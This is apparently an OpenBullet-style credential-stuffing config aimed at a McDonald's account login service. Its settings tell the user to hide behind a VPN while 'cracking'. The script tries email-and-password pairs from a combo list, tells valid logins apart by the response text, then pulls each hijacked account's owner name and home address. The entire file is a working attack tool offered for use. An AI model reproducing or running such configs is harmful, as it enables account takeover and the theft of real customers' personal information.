[SETTINGS]
{
  "Name": "McDonalds",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-08-02T18:05:21.223062+02:00",
  "AdditionalInfo": "Only works PROXYLESS, Use a vpn to crack it to make sure your own ip doesn't get banned",
  "Author": "Banana Frog <3",
  "Version": "1.3.5 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Transparent": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://profile2.mcdonalds.com/mcdspreferencecenterv2.asmx/PreferenceCenterLogin" 
  CONTENT "{'ClientID': 'MCDS', 'EmailAddress': '<USER>', 'Password': '<PASS>', 'CultureInfo':'', 'ExternalInfo':''}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.mcdonalds.com/us/en-us/subscription.html?op=update" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"Type\":\"ERROR\"}]}}" 
    KEY "Login combination is invalid.  Try again or register now." 
  KEYCHAIN Success OR 
    KEY "\",\"ErrorDesc\":null" 
    KEY ",\"Type\":\"PROCESSED\"}]}}" 

PARSE "<SOURCE>" LR "\":[{\"ProfileID\":\"" "\"," -> VAR "PROFILEID" 

REQUEST POST "https://profile2.mcdonalds.com/mcdspreferencecenterv2.asmx/GetPreferenceCenterProfile" 
  CONTENT "{'ClientID': 'MCDS','ProfileID' : '<PROFILEID>','ExternalInfo':'', 'CultureInfo':''}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 

PARSE "<SOURCE>" LR "\"FIRSTNAME\":\"" "\"," -> CAP "First name" 

PARSE "<SOURCE>" LR "\"LASTNAME\":\"" "\"," -> CAP "Last name" 

PARSE "<SOURCE>" LR "\"ADDRESS1\":\"" "\"," -> CAP "Address" 

PARSE "<SOURCE>" LR "\"ADDRESS2\":" ",\"" -> VAR "Address_2nd" 

FUNCTION Replace "null" "" "<Address_2nd>" -> CAP "Address 2" 

PARSE "<SOURCE>" LR "\"CITY\":\"" "\"," -> CAP "City" 

PARSE "<SOURCE>" LR "\"STATE\":\"" "\"," -> CAP "State" 

PARSE "<SOURCE>" LR "\"ZIPCODE\":\"" "\"," -> CAP "Zipcode" 

